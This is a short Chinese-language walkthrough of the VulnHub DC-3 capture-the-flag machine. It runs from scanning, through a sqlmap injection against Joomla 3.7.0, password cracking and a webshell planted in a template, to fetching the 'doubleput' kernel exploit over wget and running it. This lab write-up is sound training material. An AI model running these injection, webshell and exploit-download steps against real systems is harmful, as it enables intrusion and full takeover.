DC-3打靶记录

环境下载

https://www.vulnhub.com/entry/dc-32,312/

一、扫描主机确定IP

arp-scan -l

IP为 192.168.117.143

二、扫描端口

nmap -sS -T4 -A 192.168.117.143 -p 0-65535

全端口SYN 半链接扫描

ok的只有个80端口 登录看看

三、访问80端口

joomla的

利用kali自带扫描器joomscan 没有的可以安装一下

apt-get update
apt-get install joomscan

joomscan -u http://192.168.117.143

就出来两个东西

版本号 和后台管理的目录

找找有没有可以利用的漏洞

searchspolit joomla 3.7.0

肯定不用xss啊选择sql注入

cat 一下文件看一下poc

利用神器来脱裤

sqlmap -u "http://192.168.117.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering]

接下来就脱裤 找admin密码

经过加密了

用john来破解密码

john dc-3

得到密码 去登陆

找文件上传点放马子

四、getshell

找到文件上传点

写马 然后蚁剑连接

然后这个bzz3模块的默认地址可以百度
/templates/beez3/ftshell.php

开启虚拟终端下一步来提权

五、提权

既然没有sudo 呢就看版本来提权

查看版本

cat /proc/version
uname -a

然后查找提权的poc

然后在本地起一个http服务 让服务器下载后压缩执行就行了

python -m http.server 8000
wget http://192.168.117.134/39772.zip

下载成功执行脚本提权

./compile.sh
./doubleput